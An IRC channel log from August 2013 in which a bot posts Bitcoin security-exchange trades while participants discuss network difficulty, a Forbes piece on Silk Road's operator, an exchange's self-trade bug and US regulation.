[BTCTC] [DMS.SELLING] 21 @ 0.01791 = 0.3761 BTC [-] Aug 14 21:12:58 [BTCTC] [DMS.SELLING] 30 @ 0.01791 = 0.5373 BTC [-] Aug 14 21:12:58 [BTCTC] [DMS.SELLING] 60 @ 0.0179 = 1.074 BTC [-] Aug 14 21:13:00 [BTCTC] [DMS.SELLING] 108 @ 0.0179 = 1.9332 BTC [-] Aug 14 21:13:07 [BTCTC] [DMS.MINING] 191 @ 0.00271 = 0.5176 BTC [-] Aug 14 21:14:15 [BTCTC] [KENILWORTH] 4 @ 0.0016 = 0.0064 BTC [+] Aug 14 21:14:30 [BTCTC] [DMS.SELLING] 55 @ 0.01834 = 1.0087 BTC [+] Aug 14 21:14:31 [BTCTC] [DMS.MINING] 210 @ 0.002725 = 0.5723 BTC [+] Aug 14 21:14:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.03933 BTC [-] Aug 14 21:14:48 [BTCTC] [TAT.ASICMINER] 4 @ 0.0393 = 0.1572 BTC [-] Aug 14 21:16:36 [BTCTC] [DMS.PURCHASE] 20 @ 0.02079 = 0.4158 BTC [+] Aug 14 21:16:38 [BTCTC] [DMS.PURCHASE] 54 @ 0.02079 = 1.1227 BTC [+] Aug 14 21:17:07 [BTCTC] [TAT.VIRTUALMINE] 4 @ 0.001048 = 0.0042 BTC [+] Aug 14 21:19:03 [BTCTC] [LABCOIN] 16 @ 0.001567 = 0.0251 BTC [-] Aug 14 21:19:20 [BTCTC] [LABCOIN] 131 @ 0.001568 = 0.2054 BTC [+] Aug 14 21:21:07 [BTCTC] [DMS.SELLING] 3 @ 0.0182 = 0.0546 BTC [-] Aug 14 21:22:29 [BTCTC] [DMS.MINING] 200 @ 0.00271 = 0.542 BTC [-] Aug 14 21:26:50 ;;nethash Aug 14 21:26:51 398577.874481 Aug 14 21:26:55 .d Aug 14 21:26:55 50810339.04828 | Next Diff in 1859 blocks | Estimated Change: 7.8395% in 11d 21h 30m 32s Aug 14 21:27:07 ;;bc,stats Aug 14 21:27:10 Current Blocks: 252156 | Current Difficulty: 5.081033904827648E7 | Next Difficulty At Block: 254015 | Next Difficulty In: 1859 blocks | Next Difficulty In About: 1 week, 4 days, 18 hours, 22 minutes, and 47 seconds | Next Difficulty Estimate: None | Estimated Percent Change: None Aug 14 21:27:20 ;;estimate Aug 14 21:27:21 Next difficulty estimate | None based on data since last change | 55679836.2171 based on data for last three days Aug 14 21:28:52 [BTCTC] [LABCOIN] 2 @ 0.001567 = 0.0031 BTC [-] Aug 14 21:28:54 [BTCTC] [LABCOIN] 20 @ 0.001566 = 0.0313 BTC [-] Aug 14 21:30:56 [BTCTC] [ASICMINER-PT] 1 @ 4.048 BTC [+] Aug 14 21:30:57 [BTCTC] [ASICMINER-PT] 1 @ 4.049 BTC [+] Aug 14 21:32:31 http://trilema.com/2013/1btc-moving-right-along/#comment-94530 Aug 14 21:32:32 jus Aug 14 21:32:34 1BTC moving right along pe Trilema - Un blog de Mircea Popescu. Aug 14 21:32:42 ' to remind everyone of Bitcoin's EVE corp. Aug 14 21:33:08 [BTCTC] [DMS.MINING] 709 @ 0.002725 = 1.932 BTC [+] Aug 14 21:34:58 [BTCTC] [DMS.MINING] 474 @ 0.002773 = 1.3144 BTC [+] Aug 14 21:35:00 [BTCTC] [DMS.MINING] 94 @ 0.002774 = 0.2608 BTC [+] Aug 14 21:35:01 [BTCTC] [DMS.MINING] 60 @ 0.00285 = 0.171 BTC [+] Aug 14 21:35:02 [BTCTC] [DMS.MINING] 82 @ 0.002979 = 0.2443 BTC [+] Aug 14 21:35:48 [HAVELOCK] [HIM] 1 @ 0.205 BTC [+] Aug 14 21:37:42 [HAVELOCK] [HIM] 5 @ 0.2 = 1 BTC [-] Aug 14 21:38:15 [BTCTC] [TAT.ASICMINER] 1 @ 0.03991 BTC [+] Aug 14 21:38:21 [HAVELOCK] [AM100] 1 @ 0.03901999 BTC [+] Aug 14 21:38:23 [HAVELOCK] [AM100] 5 @ 0.0391 = 0.1955 BTC [+] Aug 14 21:38:26 [BTCTC] [DMS.MINING] 20 @ 0.00289 = 0.0578 BTC [-] Aug 14 21:38:47 [HAVELOCK] [XBOND] 408 @ 0.001049 = 0.428 BTC [+] Aug 14 21:39:19 [HAVELOCK] [XBOND] 329 @ 0.001049 = 0.3451 BTC [+] Aug 14 21:39:21 [HAVELOCK] [XBOND] 737 @ 0.0010489 = 0.773 BTC [-] Aug 14 21:39:24 [HAVELOCK] [XBOND] 1 @ 0.0010485 BTC [-] Aug 14 21:39:26 [HAVELOCK] [XBOND] 1 @ 0.001048 BTC [-] Aug 14 21:39:28 [HAVELOCK] [XBOND] 17 @ 0.001044 = 0.0177 BTC [-] Aug 14 21:39:29 [HAVELOCK] [XBOND] 1 @ 0.00104341 BTC [-] Aug 14 21:39:31 [HAVELOCK] [XBOND] 914 @ 0.0010434 = 0.9537 BTC [-] Aug 14 21:39:56 [BTCTC] [DMS.MINING] 1 @ 0.002925 BTC [+] Aug 14 21:40:42 [BTCTC] [COGNITIVE] 1 @ 0.39 BTC [-] Aug 14 21:40:43 [BTCTC] [COGNITIVE] 1 @ 0.39 BTC [-] Aug 14 21:40:57 [BTCTC] [TAT.ASICMINER] 4 @ 0.03991 = 0.1596 BTC [+] Aug 14 21:40:58 [BTCTC] [DMS.MINING] 33 @ 0.002925 = 0.0965 BTC [+] Aug 14 21:40:59 [BTCTC] [TAT.ASICMINER] 9 @ 0.03992 = 0.3593 BTC [+] Aug 14 21:41:04 [HAVELOCK] [AM100] 5 @ 0.03912 = 0.1956 BTC [+] Aug 14 21:42:41 [HAVELOCK] [AM100] 1 @ 0.03912 BTC [+] Aug 14 21:43:38 where's the POS? Aug 14 21:44:05 [HAVELOCK] [LABCO] 10 @ 0.00159 = 0.0159 BTC [+] Aug 14 21:44:06 jurov in iro Aug 14 21:45:36 [HAVELOCK] [VTX] 2 @ 0.61 = 1.22 BTC [+] Aug 14 21:46:06 [HAVELOCK] [XBOND] 1 @ 0.001046 BTC [+] Aug 14 21:46:23 [HAVELOCK] [VTX] 3 @ 0.61 = 1.83 BTC [+] Aug 14 21:46:41 [BTCTC] [DMS.MINING] 36 @ 0.002925 = 0.1053 BTC [+] Aug 14 21:51:27 [HAVELOCK] [LABCO] 21 @ 0.001291 = 0.0271 BTC [-] Aug 14 21:51:40 [HAVELOCK] [AM100] 18 @ 0.03912 = 0.7042 BTC [+] Aug 14 21:51:50 [HAVELOCK] [XBOND] 23 @ 0.0010459 = 0.0241 BTC [-] Aug 14 21:54:49 [BTCTC] [COG.F2] 1 @ 5.229 BTC [-] Aug 14 21:55:44 [HAVELOCK] [AM100] 1 @ 0.038 BTC [-] Aug 14 21:55:55 [HAVELOCK] [HIM] 1 @ 0.2 BTC [-] Aug 14 21:56:00 [BTCTC] [DMS.SELLING] 50 @ 0.01835 = 0.9175 BTC [+] Aug 14 21:56:01 [BTCTC] [DMS.SELLING] 64 @ 0.01841 = 1.1782 BTC [+] Aug 14 21:56:26 [HAVELOCK] [AM100] 1 @ 0.03761 BTC [-] Aug 14 21:56:50 [BTCTC] [DMS.SELLING] 449 @ 0.01842 = 8.2706 BTC [+] Aug 14 21:57:02 [HAVELOCK] [AM100] 5 @ 0.03761 = 0.1881 BTC [-] Aug 14 21:57:04 [HAVELOCK] [AM100] 5 @ 0.0376 = 0.188 BTC [-] Aug 14 21:57:07 [HAVELOCK] [AM100] 16 @ 0.0375 = 0.6 BTC [-] Aug 14 21:57:09 [HAVELOCK] [AM100] 8 @ 0.0374 = 0.2992 BTC [-] Aug 14 21:57:11 [HAVELOCK] [AM100] 10 @ 0.0373 = 0.373 BTC [-] Aug 14 21:57:13 [HAVELOCK] [AM100] 7 @ 0.0372 = 0.2604 BTC [-] Aug 14 21:57:15 [HAVELOCK] [AM100] 10 @ 0.0371 = 0.371 BTC [-] Aug 14 21:57:17 [HAVELOCK] [AM100] 90 @ 0.0369001 = 3.321 BTC [-] Aug 14 21:57:19 [HAVELOCK] [AM100] 10 @ 0.0369 = 0.369 BTC [-] Aug 14 21:57:21 [HAVELOCK] [AM100] 160 @ 0.03685 = 5.896 BTC [-] Aug 14 21:57:23 [HAVELOCK] [AM100] 26 @ 0.0368201 = 0.9573 BTC [-] Aug 14 21:57:25 [HAVELOCK] [XBOND] 714 @ 0.0010459 = 0.7468 BTC [-] Aug 14 21:57:38 [BTCTC] [DMS.SELLING] 2 @ 0.01843 = 0.0369 BTC [+] Aug 14 21:57:55 [BTCTC] [DMS.PURCHASE] 57 @ 0.02079 = 1.185 BTC [+] Aug 14 21:59:25 [BTCTC] [DMS.SELLING] 50 @ 0.01843 = 0.9215 BTC [+] Aug 14 21:59:27 [BTCTC] [DMS.PURCHASE] 396 @ 0.02079 = 8.2328 BTC [+] Aug 14 21:59:38 [BTCTC] [LABCOIN] 1 @ 0.001565 BTC [-] Aug 14 22:00:01 [HAVELOCK] [AM1] [PAID] 16.10717952 BTC to 768 shares, 2097289 satoshi per share Aug 14 22:00:23 [HAVELOCK] [AM100] [PAID] 49.96162164 BTC to 250`761 shares, 19924 satoshi per share Aug 14 22:00:42 [BTCTC] [LABCOIN] 19 @ 0.001565 = 0.0297 BTC [-] Aug 14 22:00:44 [BTCTC] [LABCOIN] 1331 @ 0.001564 = 2.0817 BTC [-] Aug 14 22:01:35 [HAVELOCK] [XBOND] 1 @ 0.0010497 BTC [+] Aug 14 22:01:39 [BTCTC] [DMS.MINING] 4 @ 0.0027 = 0.0108 BTC [-] Aug 14 22:01:40 [BTCTC] [DMS.MINING] 10 @ 0.002634 = 0.0263 BTC [-] Aug 14 22:01:42 [BTCTC] [DMS.MINING] 38 @ 0.002633 = 0.1001 BTC [-] Aug 14 22:03:58 [HAVELOCK] [XBOND] 21 @ 0.0010497 = 0.022 BTC [+] Aug 14 22:04:00 [BTCTC] [DMS.MINING] 162 @ 0.002633 = 0.4265 BTC [-] Aug 14 22:04:02 [BTCTC] [DMS.MINING] 234 @ 0.002602 = 0.6089 BTC [-] Aug 14 22:04:33 [HAVELOCK] [AM100] 5 @ 0.0391 = 0.1955 BTC [+] Aug 14 22:04:42 [BTCTC] [DMS.PURCHASE] 50 @ 0.02079 = 1.0395 BTC [+] Aug 14 22:04:44 [HAVELOCK] [AM100] 3 @ 0.039 = 0.117 BTC [-] Aug 14 22:05:15 [HAVELOCK] [AM100] 4 @ 0.039 = 0.156 BTC [-] Aug 14 22:06:10 [HAVELOCK] [AM100] 1 @ 0.039 BTC [-] Aug 14 22:06:25 [HAVELOCK] [AM100] 10 @ 0.039 = 0.39 BTC [-] Aug 14 22:07:28 [BTCTC] [DMS.MINING] 50 @ 0.002603 = 0.1302 BTC [+] Aug 14 22:08:18 [BTCTC] [DMS.PURCHASE] 4 @ 0.02079 = 0.0832 BTC [+] Aug 14 22:09:21 [BTCTC] [BASIC-MINING] 1 @ 0.3219 BTC [-] Aug 14 22:10:47 [HAVELOCK] [AM100] 1 @ 0.0389 BTC [-] Aug 14 22:10:58 [BTCTC] [BASIC-MINING] 1 @ 0.3219 BTC [-] Aug 14 22:10:59 [BTCTC] [BASIC-MINING] 3 @ 0.322 = 0.966 BTC [+] Aug 14 22:11:38 [HAVELOCK] [AM100] 2 @ 0.0389 = 0.0778 BTC [-] Aug 14 22:12:18 [BTCTC] [BASIC-MINING] 1 @ 0.322 BTC [+] Aug 14 22:12:27 [BTCTC] [TAT.ASICMINER] 2 @ 0.0404 = 0.0808 BTC [+] Aug 14 22:13:03 [HAVELOCK] [AM100] 1 @ 0.0388999 BTC [-] Aug 14 22:13:25 [MPEX] [S.MPOE] 2412 @ 0.00084316 = 2.0337 BTC [-] Aug 14 22:14:11 [BTCTC] [DMS.MINING] 4 @ 0.002622 = 0.0105 BTC [+] Aug 14 22:14:48 [HAVELOCK] [AM100] 2 @ 0.0388 = 0.0776 BTC [-] Aug 14 22:16:24 [MPEX] [S.MPOE] 17488 @ 0.00084233 = 14.7307 BTC [-] Aug 14 22:16:25 [MPEX] [S.MPOE] 812 @ 0.00084333 = 0.6848 BTC [+] Aug 14 22:17:53 [BTCTC] [DMS.MINING] 50 @ 0.002622 = 0.1311 BTC [+] Aug 14 22:18:02 [BTCTC] [CB.IDIFF-O] 1 @ 0.0093 BTC [-] Aug 14 22:19:36 http://www.forbes.com/sites/andygreenberg/2013/08/14/meet-the-dread-pirate-roberts-the-man-behind-booming-black-market-drug-website-silk-road/ http://silkroadlink.com/ Aug 14 22:19:38 Meet The Dread Pirate Roberts, The Man Behind Booming Black Market Drug Website Silk Road - Forbes Aug 14 22:19:44 Good read. Aug 14 22:20:13 [BTCTC] [DMS.PURCHASE] 3 @ 0.02079 = 0.0624 BTC [+] Aug 14 22:20:24 !last DMS.MINING Aug 14 22:20:24 Quest for vision is a great blessing. Aug 14 22:20:31 !last btctc DMS.MINING Aug 14 22:20:32 Last trade for DMS.MINING on BTCTC was at 0.002622 BTC [+] Aug 14 22:20:40 o look, yet another bitcoin unimportant person Aug 14 22:20:45 !last btctc DMS.SELLING Aug 14 22:20:45 Last trade for DMS.SELLING on BTCTC was at 0.01843 BTC [+] Aug 14 22:20:54 [HAVELOCK] [XBOND] 11 @ 0.0010495 = 0.0115 BTC [-] Aug 14 22:21:37 mircea_popescu, shouldn't you be off killing babies or whatever it is you do? Aug 14 22:21:57 [HAVELOCK] [XBOND] 448 @ 0.0010496 = 0.4702 BTC [+] Aug 14 22:22:21 mircea_popescu: the news is the noob-friendly page, bringing new users etc. Aug 14 22:22:23 [HAVELOCK] [SMG] 3 @ 0.00021999 = 0.0007 BTC [+] Aug 14 22:22:27 not sure how that will turn out Aug 14 22:22:54 [HAVELOCK] [AM100] 1 @ 0.0388 BTC [-] Aug 14 22:22:56 [HAVELOCK] [AM100] 1 @ 0.0388 BTC [-] Aug 14 22:23:34 imsaguy go make some! Aug 14 22:24:01 [HAVELOCK] [XBOND] 28 @ 0.0010495 = 0.0294 BTC [-] Aug 14 22:24:26 with pleasure! Aug 14 22:24:53 [BTCTC] [ASICMINER-PT] 10 @ 3.94 = 39.4 BTC [-] Aug 14 22:25:58 “We can’t stay silent forever. We have an important message, and the time is ripe for the world to hear it. What we’re doing isn’t about scoring drugs or ‘sticking it to the man.’ It’s about standing up for our rights as human beings and refusing to submit when we’ve done no wrong.” - DPR Aug 14 22:26:17 Preach. Aug 14 22:27:19 anyone got couple of eur on neteller? Aug 14 22:27:22 [BTCTC] [LABCOIN] 2 @ 0.001597 = 0.0032 BTC [+] Aug 14 22:27:23 [BTCTC] [LABCOIN] 20 @ 0.001598 = 0.032 BTC [+] Aug 14 22:27:25 [BTCTC] [LABCOIN] 6 @ 0.001599 = 0.0096 BTC [+] Aug 14 22:27:42 [HAVELOCK] [CFIG] 2 @ 0.15 = 0.3 BTC Aug 14 22:28:09 [HAVELOCK] [XBOND] 34 @ 0.0010495 = 0.0357 BTC [-] Aug 14 22:28:17 kleeck it's the second time the wayward ny idiot has ruined the usg's position in a year. Aug 14 22:29:07 [HAVELOCK] [AM100] 3 @ 0.0388 = 0.1164 BTC [-] Aug 14 22:30:07 [HAVELOCK] [XBOND] 43 @ 0.001046 = 0.045 BTC [-] Aug 14 22:30:59 [BTCTC] [DMS.SELLING] 65 @ 0.01778 = 1.1557 BTC [-] Aug 14 22:31:01 [BTCTC] [DMS.SELLING] 211 @ 0.01777 = 3.7495 BTC [-] Aug 14 22:31:01 [BTCTC] [DMS.SELLING] 100 @ 0.01776 = 1.776 BTC [-] Aug 14 22:31:02 [BTCTC] [DMS.SELLING] 74 @ 0.01775 = 1.3135 BTC [-] Aug 14 22:31:17 [HAVELOCK] [XBOND] 12 @ 0.001046 = 0.0126 BTC [-] Aug 14 22:31:25 [BTCTC] [TAT.ASICMINER] 4 @ 0.04039 = 0.1616 BTC [-] Aug 14 22:32:19 [HAVELOCK] [CFIG] 1 @ 0.15 BTC Aug 14 22:32:50 [HAVELOCK] [XBOND] 300 @ 0.001046 = 0.3138 BTC [-] Aug 14 22:33:00 [HAVELOCK] [XBOND] 10 @ 0.001046 = 0.0105 BTC [-] Aug 14 22:35:15 [HAVELOCK] [AM100] 4 @ 0.038 = 0.152 BTC [-] Aug 14 22:35:36 [HAVELOCK] [CFIG] 1 @ 0.15 BTC Aug 14 22:35:58 : Who are you talking about? Andy Greenberg? DPR? Aug 14 22:36:07 [BTCTC] [BTC-BOND] 12 @ 0.009997 = 0.12 BTC [-] Aug 14 22:37:18 [BTCTC] [DMS.PURCHASE] 130 @ 0.02079 = 2.7027 BTC [+] Aug 14 22:37:32 dpr. Aug 14 22:37:42 i read it Aug 14 22:37:44 a, no, the ny state attorney guy Aug 14 22:37:54 Ah. That makes more sense. Aug 14 22:38:30 jcpham, what did you think? Aug 14 22:38:31 he ran off with some federal bank investigation, causing an uproar inside Aug 14 22:38:42 now he ran off with this one. Aug 14 22:39:04 [BTCTC] [DMS.MINING] 5 @ 0.002884 = 0.0144 BTC [+] Aug 14 22:39:18 [BTCTC] [TAT.ASICMINER] 145 @ 0.04039 = 5.8566 BTC [-] Aug 14 22:39:36 [HAVELOCK] [XBOND] 365 @ 0.001046 = 0.3818 BTC [-] Aug 14 22:40:28 [BTCTC] [TAT.ASICMINER] 3 @ 0.04039 = 0.1212 BTC [-] Aug 14 22:40:29 [HAVELOCK] [KCIM] 1 @ 0.8001 BTC [-] Aug 14 22:40:30 i think meh Aug 14 22:41:44 [HAVELOCK] [AM100] 3 @ 0.0388 = 0.1164 BTC [+] Aug 14 22:42:01 40M$ annual, that's a pretty big "meh". :) Aug 14 22:43:01 Interesting that he's decided to raise his profile - I think he's sending an interesting message, especially what you quoted kleeck Aug 14 22:43:53 [BTCTC] [TAT.ASICMINER] 1 @ 0.04 BTC [-] Aug 14 22:43:54 [BTCTC] [TAT.ASICMINER] 1 @ 0.04 BTC [-] Aug 14 22:43:56 [BTCTC] [TAT.ASICMINER] 11 @ 0.03933 = 0.4326 BTC [-] Aug 14 22:44:15 He is like the Doctor - each new operator under the DPR flag has a different personality with the same task. I wouldn't be surprised if the DPR interviewed here isn't even running SR anymore. Aug 14 22:44:29 [BTCTC] [TAT.ASICMINER] 2 @ 0.03933 = 0.0787 BTC [-] Aug 14 22:45:17 [BTCTC] [DMS.MINING] 1 @ 0.002876 BTC [-] Aug 14 22:47:37 I agree though, TomServo, very interesting. Aug 14 22:48:16 [HAVELOCK] [HIM] 50 @ 0.2 = 10 BTC [-] Aug 14 22:48:19 [HAVELOCK] [AM100] 18 @ 0.0388 = 0.6984 BTC [+] Aug 14 22:48:21 [HAVELOCK] [AM100] 11 @ 0.0388 = 0.4268 BTC [+] Aug 14 22:49:01 [HAVELOCK] [XBOND] 40 @ 0.001046 = 0.0418 BTC [-] Aug 14 22:49:06 [HAVELOCK] [CFIG] 3 @ 0.15 = 0.45 BTC Aug 14 22:51:32 [HAVELOCK] [CFIG] 14 @ 0.15 = 2.1 BTC Aug 14 22:51:49 mircea_popescu: You referring to the SR article? Aug 14 22:52:20 I missed the mention of the NY attorney Aug 14 22:52:23 [BTCTC] [LABCOIN] 240 @ 0.00158 = 0.3792 BTC [-] Aug 14 22:52:24 [BTCTC] [LABCOIN] 244 @ 0.00157 = 0.3831 BTC [-] Aug 14 22:52:26 [BTCTC] [LABCOIN] 516 @ 0.001568 = 0.8091 BTC [-] Aug 14 22:52:28 [BTCTC] [BTC-BOND] 7 @ 0.009997 = 0.07 BTC [-] Aug 14 22:52:50 [BTCTC] [KENILWORTH] 5 @ 0.0016 = 0.008 BTC [+] Aug 14 22:53:24 [BTCTC] [DMS.MINING] 10 @ 0.002873 = 0.0287 BTC [-] Aug 14 22:53:46 [HAVELOCK] [XBOND] 4 @ 0.001046 = 0.0042 BTC [-] Aug 14 22:55:09 [BTCTC] [KENILWORTH] 10 @ 0.001699 = 0.017 BTC [+] Aug 14 22:55:10 [BTCTC] [KENILWORTH] 332 @ 0.001793 = 0.5953 BTC [+] Aug 14 22:55:12 [BTCTC] [KENILWORTH] 60 @ 0.001794 = 0.1076 BTC [+] Aug 14 22:55:13 [BTCTC] [KENILWORTH] 44 @ 0.001796 = 0.079 BTC [+] Aug 14 22:55:14 [BTCTC] [KENILWORTH] 449 @ 0.001797 = 0.8069 BTC [+] Aug 14 22:55:33 TomServo only obliquely Aug 14 22:55:53 there's the people doin bitcoin, there's the people hoping the usg might make them relvant in bitcoin. distinct lists. Aug 14 22:56:07 [BTCTC] [DMS.SELLING] 57 @ 0.01826 = 1.0408 BTC [+] Aug 14 22:56:08 [BTCTC] [DMS.SELLING] 500 @ 0.01828 = 9.14 BTC [+] Aug 14 22:56:10 [BTCTC] [DMS.SELLING] 877 @ 0.01829 = 16.0403 BTC [+] Aug 14 22:57:34 [HAVELOCK] [KCIM] 2 @ 0.85 = 1.7 BTC [+] Aug 14 22:59:29 [HAVELOCK] [SMG] 215 @ 0.00019 = 0.0409 BTC [-] Aug 14 22:59:31 [HAVELOCK] [SMG] 10 @ 0.000188 = 0.0019 BTC [-] Aug 14 22:59:34 [HAVELOCK] [SMG] 10 @ 0.000187 = 0.0019 BTC [-] Aug 14 22:59:35 [HAVELOCK] [SMG] 1016 @ 0.000187 = 0.19 BTC [-] Aug 14 22:59:37 [HAVELOCK] [SMG] 1016 @ 0.000187 = 0.19 BTC [-] Aug 14 22:59:39 [HAVELOCK] [SMG] 15 @ 0.0001869 = 0.0028 BTC [-] Aug 14 22:59:41 [HAVELOCK] [SMG] 235 @ 0.0001865 = 0.0438 BTC [-] Aug 14 22:59:43 [HAVELOCK] [SMG] 10 @ 0.0001861 = 0.0019 BTC [-] Aug 14 22:59:45 [HAVELOCK] [SMG] 5747 @ 0.00018601 = 1.069 BTC [-] Aug 14 22:59:48 [HAVELOCK] [SMG] 3 @ 0.00018599 = 0.0006 BTC [-] Aug 14 22:59:50 [HAVELOCK] [SMG] 24 @ 0.000185 = 0.0044 BTC [-] Aug 14 22:59:52 [HAVELOCK] [SMG] 13 @ 0.00018282 = 0.0024 BTC [-] Aug 14 22:59:54 [HAVELOCK] [SMG] 214 @ 0.0001825 = 0.0391 BTC [-] Aug 14 22:59:55 [HAVELOCK] [SMG] 1472 @ 0.000182 = 0.2679 BTC [-] Aug 14 23:00:00 [HAVELOCK] [SMG] 8528 @ 0.000182 = 1.5521 BTC [-] Aug 14 23:00:03 [HAVELOCK] [SMG] 100 @ 0.00018105 = 0.0181 BTC [-] Aug 14 23:00:05 ono. the gig ?! Aug 14 23:00:05 [HAVELOCK] [SMG] 314 @ 0.000181 = 0.0568 BTC [-] Aug 14 23:00:07 [HAVELOCK] [SMG] 5000 @ 0.00018 = 0.9 BTC [-] Aug 14 23:00:09 [HAVELOCK] [SMG] 1863 @ 0.000171 = 0.3186 BTC [-] Aug 14 23:00:42 [BTCTC] [LABCOIN] 20 @ 0.001569 = 0.0314 BTC [+] Aug 14 23:00:43 [BTCTC] [LABCOIN] 15 @ 0.001568 = 0.0235 BTC [-] Aug 14 23:01:05 [HAVELOCK] [AM100] 1 @ 0.03744 BTC [-] Aug 14 23:01:46 [BTCTC] [TAT.MINIGAME] 100 @ 0.0002111 = 0.0211 BTC [-] Aug 14 23:01:47 [BTCTC] [TAT.MINIGAME] 3000 @ 0.0002101 = 0.6303 BTC [-] Aug 14 23:01:48 [BTCTC] [TAT.MINIGAME] 8763 @ 0.00021 = 1.8402 BTC [-] Aug 14 23:02:35 obliquely indeed, you lost me. Aug 14 23:03:38 It's ok , I tracked with you. :P Aug 14 23:04:13 kleeck: well help a brother out?! Aug 14 23:04:27 2 weeks ^ 2 weeks Aug 14 23:04:32 lol Aug 14 23:04:43 TomServo there was an earlier article about some eager ny da supoena-ing people. Aug 14 23:04:45 [HAVELOCK] [AM100] 1 @ 0.03744 BTC [-] Aug 14 23:04:50 they sorta go together. Aug 14 23:05:09 In the sense they were both on forbes? Aug 14 23:05:24 in the sense that they were discussed here in the last however long, few hours Aug 14 23:05:25 Haha. They both involved Bitcoin. Aug 14 23:06:58 [MPEX] [S.MPOE] 7800 @ 0.00084215 = 6.5688 BTC [-] Aug 14 23:07:05 [HAVELOCK] [AM100] 22 @ 0.03744 = 0.8237 BTC [-] Aug 14 23:07:08 [HAVELOCK] [XBOND] 64 @ 0.001046 = 0.0669 BTC [-] Aug 14 23:07:27 [HAVELOCK] [XBOND] 10 @ 0.001046 = 0.0105 BTC [-] Aug 14 23:07:43 [HAVELOCK] [AM100] 1 @ 0.0388 BTC [+] Aug 14 23:08:29 [MPEX] [S.MPOE] 14990 @ 0.0008425 = 12.6291 BTC [+] Aug 14 23:08:30 [MPEX] [S.MPOE] 2608 @ 0.00084333 = 2.1994 BTC [+] Aug 14 23:08:33 [MPEX] [S.MPOE] 8050 @ 0.00084391 = 6.7935 BTC [+] Aug 14 23:08:49 hmm there is no spread on xbond Aug 14 23:08:51 https://www.havelockinvestments.com/order.php?symbol=XBOND Aug 14 23:09:02 [HAVELOCK] [XBOND] 7 @ 0.001046 = 0.0073 BTC [-] Aug 14 23:09:32 [BTCTC] [DMS.SELLING] 2 @ 0.01828 = 0.0366 BTC [-] Aug 14 23:11:57 [BTCTC] [LABCOIN] 1 @ 0.001592 BTC [+] Aug 14 23:13:51 [BTCTC] [ACTIVEMINING] 10 @ 0.005378 = 0.0538 BTC [-] Aug 14 23:13:56 is that good or bad? Aug 14 23:14:32 [BTCTC] [COGNITIVE] 2 @ 0.36 = 0.72 BTC [-] Aug 14 23:14:33 [BTCTC] [COGNITIVE] 5 @ 0.3514 = 1.757 BTC [-] Aug 14 23:14:35 [BTCTC] [COGNITIVE] 3 @ 0.3513 = 1.0539 BTC [-] Aug 14 23:14:44 [HAVELOCK] [SMG] 1 @ 0.000219 BTC [+] Aug 14 23:14:57 well it's a bug Aug 14 23:15:07 trades should happen Aug 14 23:15:15 it's the same user Aug 14 23:15:19 oh Aug 14 23:15:45 [BTCTC] [COGNITIVE] 5 @ 0.3513 = 1.7565 BTC [-] Aug 14 23:15:47 [BTCTC] [COGNITIVE] 3 @ 0.351 = 1.053 BTC [-] Aug 14 23:15:48 [BTCTC] [COGNITIVE] 1 @ 0.35 BTC [-] Aug 14 23:16:12 yea Aug 14 23:16:13 same user Aug 14 23:16:30 you can't trade with yourself Aug 14 23:16:37 though, i guess if people are stupid enough to do that Aug 14 23:16:41 i should just let them (and take the trade fee) Aug 14 23:16:57 that's what the ther exchange sdo Aug 14 23:17:00 well, isn't it how btct has so much volume? :p Aug 14 23:17:14 hehe Aug 14 23:17:50 [BTCTC] [ASICMINER-PT] 1 @ 4.04 BTC [+] Aug 14 23:18:37 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00102 BTC [-] Aug 14 23:21:15 i dunno Aug 14 23:21:20 i'd rather be "better" than the others Aug 14 23:21:23 not just "do what they do" Aug 14 23:21:31 [MPEX] [S.MPOE] 4777 @ 0.00084877 = 4.0546 BTC [+] Aug 14 23:21:37 i think its sutpid to allow someone to trade with themself Aug 14 23:22:15 [BTCTC] [BITVPS] 13 @ 0.002699 = 0.0351 BTC [+] Aug 14 23:22:21 [HAVELOCK] [HIM] 1 @ 0.21799999 BTC [+] Aug 14 23:22:23 [HAVELOCK] [HIM] 4 @ 0.2239 = 0.8956 BTC [+] Aug 14 23:23:27 [HAVELOCK] [VTX] 2 @ 0.62 = 1.24 BTC [+] Aug 14 23:23:30 [HAVELOCK] [VTX] 3 @ 0.621 = 1.863 BTC [+] Aug 14 23:23:32 [HAVELOCK] [VTX] 2 @ 0.622 = 1.244 BTC [+] Aug 14 23:23:35 [HAVELOCK] [VTX] 6 @ 0.623951 = 3.7437 BTC [+] Aug 14 23:25:04 but it does make it look kinda funny Aug 14 23:25:06 no spread at all Aug 14 23:25:15 [BTCTC] [DMS.SELLING] 5 @ 0.01828 = 0.0914 BTC [-] Aug 14 23:25:18 like "zomg its a bug!" Aug 14 23:25:20 but its really not Aug 14 23:25:30 more like "zomg its an idiot!" Aug 14 23:25:30 [HAVELOCK] [XBOND] 13 @ 0.001046 = 0.0136 BTC [-] Aug 14 23:25:40 wonder if its a bot gon awry Aug 14 23:27:55 http://www.entrepreneur.com/article/227849 Aug 14 23:27:57 U.S. Regulators Aim to Close 'Wild West' Frontier of Bitcoin | Entrepreneur.com Aug 14 23:28:29 [HAVELOCK] [AM100] 1 @ 0.03879999 BTC [-] Aug 14 23:28:31 [BTCTC] [LABCOIN] 3 @ 0.001569 = 0.0047 BTC [-] Aug 14 23:28:40 yeah I wish people would quit printing bullshit stories Aug 14 23:28:53 bitcoin is the highest regulated currency in history Aug 14 23:29:28 I dont get what they think they can bring to the table that they havent already Aug 14 23:30:39 Why don't they start closing the "Fat stacks of USD bills" "Wild West" Aug 14 23:30:52 [HAVELOCK] [VTX] 1 @ 0.6300001 BTC [+] Aug 14 23:31:23 yeah really Aug 14 23:31:45 its already illegal to sell illegal drugs, rent prostitutes, and buy black market guns Aug 14 23:31:58 notice I didnt say "its illegal to do this with USD" Aug 14 23:32:08 no, its illegal in any form Aug 14 23:32:11 because you are wrong, yes Aug 14 23:32:28 so what is it that they think is a wild west Aug 14 23:32:30 its already illegal Aug 14 23:32:31 Namworld been trying for a few decades. Aug 14 23:32:35 you have the same problem the regulators do Aug 14 23:32:45 dub: well no Aug 14 23:32:49 the problem is they refuse to enforce the laws Aug 14 23:32:52 prostitution is not illegal Aug 14 23:33:00 illegal drugs is not even a thing Aug 14 23:33:09 [BTCTC] [TAT.VIRTUALMINE] 89 @ 0.00102 = 0.0908 BTC [-] Aug 14 23:33:11 can we just kickban dub until he stops trolling? Aug 14 23:33:27 I'm enjoying this. Go on, dub. Aug 14 23:33:29 this is just america (you) trying to wons omethign again Aug 14 23:33:31 no cause he keeps track of bitcoin idiocy. 